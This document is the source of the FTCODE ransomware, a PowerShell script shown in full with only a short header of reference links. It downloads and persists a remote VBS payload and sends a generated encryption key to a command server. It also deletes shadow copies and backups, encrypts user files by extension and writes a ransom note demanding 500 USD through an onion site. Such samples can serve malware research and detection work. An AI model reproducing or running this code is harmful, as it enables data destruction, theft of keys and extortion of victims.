<# FTCODE ransomware
https://twitter.com/matte_lodi/status/1181124751160422401
https://www.bleepingcomputer.com/news/security/ftcode-powershell-ransomware-resurfaces-in-spam-campaign/
https://app.any.run/tasks/aab1ffcb-98e3-4bc9-9be2-5e82fe528484
#>
function dywxjbzzg() {
$hjtjyuwxz = $env:PUBLIC + "\Libraries" if ( - not (Test - Path $hjtjyuwxz)) {
md $hjtjyuwxz;
}
$ivvbdgxjdg = $hjtjyuwxz + "\WindowsIndexingService.vbs";
$dbugtxcs = New - Object System.Net.WebClient;
$dbugtxcs.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
try {
$uceycjf = Join - Path $hjtjyuwxz ( get - random - minimum 100 - maximum 999999 );
$dbugtxcs.DownloadString("http://home.healthiestu.com/?need=6ff4040&vid=dpec6&") | out - file $uceycjf;
Start - Sleep - s 5;
if ( ( test - path - path $uceycjf ) - and ( ( (Get - Item $uceycjf).length/1KB) -gt 5 ) ){ Move-Item $uceycjf -destination $ivvbdgxjdg -Force; $fagtzcgfg = (schtasks.exe /create /TN "WindowsApplicationService" /sc DAILY /st 00:00 /f /RI 13 /du 23:59 / TR $ivvbdgxjdg);
try {
$uyuhszzt = [Environment]::GetFolderPath('Startup') + '\WindowsApplicationService.lnk';
if ( - not ( Test - Path $uyuhszzt ) ) {
$cibauhvg = New - Object - ComObject ('WScript.Shell');
$vhvwiyeuxd = $cibauhvg.CreateShortcut( $uyuhszzt );
$vhvwiyeuxd.TargetPath = $ivvbdgxjdg;
$vhvwiyeuxd.WorkingDirectory = $hjtjyuwxz;
$vhvwiyeuxd.WindowStyle = 1;
$vhvwiyeuxd.Description = 'Windows Application Service';
$vhvwiyeuxd.Save();
}
} catch {};
}
} catch {}
};
dywxjbzzg;
function hjgcwfsiei( $ifwxibhss ) {
$dbugtxcs = New - Object System.Net.WebClient;
$dbugtxcs.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
$dbugtxcs.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$dbugtxcs.Encoding = [System.Text.Encoding]::UTF8;
try {
$tafjssfc = $dbugtxcs.UploadString( "http://connect.hairsalonlongmont.com/", ("ver=$scwgygzdu&vid=dpec6&guid=$ijwctat&psver=" + ( ( (Get - Host).Version ).Major ) + "&" + $ifwxibhss) );
if ( $tafjssfc - eq "ok" ) {
return $true;
}
} catch {};
return $false;
};
function ddbjeajiiz( $ghhzgav ) {
try {
Start - Process - WindowStyle Hidden - FilePath "$env:comspec" - ArgumentList "/c $ghhzgav";
} catch {}
};
function dwfuacxisj($xwfvsfb, $izhzdwi) {
$yavhiujvsg = "BXCODE hack your system";
$bscdvvix = "BXCODE INIT";
$hygazadbij = new - Object System.Security.Cryptography.RijndaelManaged;
$tzbhbhutb = [Text.Encoding]::UTF8.GetBytes($izhzdwi);
$yavhiujvsg = [Text.Encoding]::UTF8.GetBytes($yavhiujvsg);
$hygazadbij.Key = (new - Object Security.Cryptography.PasswordDeriveBytes $tzbhbhutb, $yavhiujvsg, "SHA1", 5).GetBytes(32);
$hygazadbij.IV = (new - Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($bscdvvix) )[0..15];
$hygazadbij.Padding = "Zeros";
$hygazadbij.Mode = "CBC";
$fyyxdehdbx = $hygazadbij.CreateEncryptor();
$zudjbafz = new - Object IO.MemoryStream;
$hzewbxas = new - Object Security.Cryptography.CryptoStream $zudjbafz, $fyyxdehdbx, "Write";
$hzewbxas.Write($xwfvsfb, 0, $xwfvsfb.Length);
$hzewbxas.Close();
$zudjbafz.Close();
$hygazadbij.Clear();
return $zudjbafz.ToArray();
}
$scwgygzdu = "1003.1";
$ijwctat = [guid]::NewGuid();
$zvjethg = $env:temp + "\AFX50058.tmp";
sc - Path $zvjethg - Value $(Get - Date);
$bjiewwwwg = [Reflection.Assembly]::LoadWithPartialName('System.Security');
Add - Type - Assembly System.Web;
$hjtjyuwxz = $env:PUBLIC + "\OracleKit";
if ( - not (Test - Path $hjtjyuwxz)) {
md $hjtjyuwxz;
}
$jeuacfx = $hjtjyuwxz + "\w00log03.tmp";
if ( Test - Path $jeuacfx ) {
hjgcwfsiei "status=exit_file";
exit;
} else {
sc - Path $jeuacfx - Value $ijwctat - Force;
};
$uebvuvzztb = [Web.Security.Membership]::GeneratePassword(50, 4);
[byte[]]$zhfvjij = [system.Text.Encoding]::Unicode.GetBytes($uebvuvzztb);
$cffitahbbi = "BgIAAACkAABSU0ExAAQAAAEAAQDTYUZyVxhh48R/1Y/H5NdEgi49DIHtJTXm+mcVHnvUpYiNEnxpFj/UJXVDg0F2rfWFpnyqHJ0dbyjsOCwMX0eRyp2VxrWFzOHIM6QpevxGF9izXeNq7+OzBuo11V/7EmvQBW2sfuNEOP7zdUw0DFKoK+X2Taewaki1LGYhpshjqg==";
$dtghzhtgz = New - Object System.Security.Cryptography.RSACryptoServiceProvider;
$dtghzhtgz.ImportCspBlob([system.Convert]::FromBase64String($cffitahbbi));
$ueuzadcuga = [system.Convert]::ToBase64String($dtghzhtgz.Encrypt($zhfvjij, $false));
if ( ( hjgcwfsiei( "&ek=" + ([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes( $uebvuvzztb ) )) ) ) ) {
sc - Path $jeuacfx - Value $ijwctat - Force;
} else {
ri - Path $jeuacfx - Force;
hjgcwfsiei "status=exit_answer";
exit;
}
sbyxvbzxuv = "
All your files was encrypted!
Yes, You can Decrypt Files Encrypted!!! our price 500 USD
Your personal ID: $ijwctat
1. Download Tor browser - https://www.torproject.org/download/
2. Install Tor browser
3. Open Tor Browser
4. Open link in TOR browser: http://qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd.onion/?guid=$ijwctat
5. Follow the instructions on this page
***** Warning*****
Do not rename files
Do not try to back your data using third-party software, it may cause permanent data loss(If you do not believe us, and still try to - make copies of all files so that we can help you if third-party software harms them)
As evidence, we can for free back one file
Decoders of other users is not suitable to back your files - encryption key is created on your computer when the program is launched - it is unique.
";
ddbjeajiiz('bcdedit /set ztcxebbwya bootstatuspolicy ignoreallfailures');
ddbjeajiiz('bcdedit /set ztcxebbwya recoveryenabled no');
ddbjeajiiz('wbadmin delete catalog -quiet');
ddbjeajiiz('wbadmin delete systemstatebackup');
ddbjeajiiz('wbadmin delete backup');
ddbjeajiiz('vssadmin delete shadows /all /quiet');
$ifggctxeja = 0;
hjgcwfsiei ("status=start" );
$judcuxzwd = Get - PSDrive|Where - Object {
$_.Free - gt 50000
}
|Sort - Object - Descending;
foreach($bdwwbwxtey in $judcuxzwd) {
try {
gci $bdwwbwxtey.root - Recurse - Include "*.sql", "*.mp4", "*.7z", "*.rar", "*.m4a", "*.wma", "*.avi", "*.wmv", "*.csv", "*.d3dbsp", "*.zip", "*.sie", "*.sum", "*.ibank", "*.t13", "*.t12", "*.qdf", "*.gdb", "*.tax", "*.pkpass", "*.bc6", "*.bc7", "*.bkp", "*.qic", "*.bkf", "*.sidn", "*.sidd", "*.mddata", "*.itl", "*.itdb", "*.icxs", "*.hvpl", "*.hplg", "*.hkdb", "*.mdbackup", "*.syncdb", "*.gho", "*.cas", "*.svg", "*.map", "*.wmo", "*.itm", "*.sb", "*.fos", "*.mov", "*.vdf", "*.ztmp", "*.sis", "*.sid", "*.ncf", "*.menu", "*.layout", "*.dmp", "*.blob", "*.esm", "*.vcf", "*.vtf", "*.dazip", "*.fpk", "*.mlx", "*.kf", "*.iwd", "*.vpk", "*.tor", "*.psk", "*.rim", "*.w3x", "*.fsh", "*.ntl", "*.arch00", "*.lvl", "*.snx", "*.cfr", "*.ff", "*.vpp_pc", "*.lrf", "*.m2", "*.mcmeta", "*.vfs0", "*.mpqge", "*.kdb", "*.db0", "*.dba", "*.rofl", "*.hkx", "*.bar", "*.upk", "*.das", "*.iwi", "*.litemod", "*.asset", "*.forge", "*.ltx", "*.bsa", "*.apk", "*.re4", "*.sav", "*.lbf", "*.slm", "*.bik", "*.epk", "*.rgss3a", "*.pak", "*.big", "*wallet", "*.wotreplay", "*.xxx", "*.desc", "*.py", "*.m3u", "*.flv", "*.js", "*.css", "*.rb", "*.png", "*.jpeg", "*.txt", "*.p7c", "*.p7b", "*.p12", "*.pfx", "*.pem", "*.crt", "*.cer", "*.der", "*.x3f", "*.srw", "*.pef", "*.ptx", "*.r3d", "*.rw2", "*.rwl", "*.raw", "*.raf", "*.orf", "*.nrw", "*.mrwref", "*.mef", "*.erf", "*.kdc", "*.dcr", "*.cr2", "*.crw", "*.bay", "*.sr2", "*.srf", "*.arw", "*.3fr", "*.dng", "*.jpe", "*.jpg", "*.cdr", "*.indd", "*.ai", "*.eps", "*.pdf", "*.pdd", "*.psd", "*.dbf", "*.mdf", "*.wb2", "*.rtf", "*.wpd", "*.dxg", "*.xf", "*.dwg", "*.pst", "*.accdb", "*.mdb", "*.pptm", "*.pptx", "*.ppt", "*.xlk", "*.xlsb", "*.xlsm", "*.xlsx", "*.xls", "*.wps", "*.docm", "*.docx", "*.doc", "*.odb", "*.odc", "*.odm", "*.odp", "*.ods", "*.odt" |% {
try {
$tssdvahsgi = [io.file]::Open($_, 'Open', 'ReadWrite');
if ($tssdvahsgi.Length - lt "40960") {
$fizeigzsuu = $tssdvahsgi.Length
} else {
$fizeigzsuu = "40960"
}
[byte[]]$azwwezuyyz = new - object byte[] $fizeigzsuu;
$asihybvzh = $tssdvahsgi.Read($azwwezuyyz, 0, $azwwezuyyz.Length);
$tssdvahsgi.Position = '0';
$axshudetg = dwfuacxisj $azwwezuyyz $uebvuvzztb;
$tssdvahsgi.Write($axshudetg, 0, $axshudetg.Length);
$tssdvahsgi.Close();
$uhhzdshvj = $_.Name + ".FTCODE";
ren - Path $_.FullName - NewName $uhhzdshvj - Force;
$yjxegdax = $_.DirectoryName + "\READ_ME_NOW.htm";
if (!(Test - Path $yjxegdax)) {
sc - Path $yjxegdax - Value $sbyxvbzxuv - Force;
sc - Path $zvjethg - Value $(Get - Date) - Force;
}
$ifggctxeja++;
} catch {}
}
} catch {}
}
hjgcwfsiei ("status=done&res=$ifggctxeja");
Comments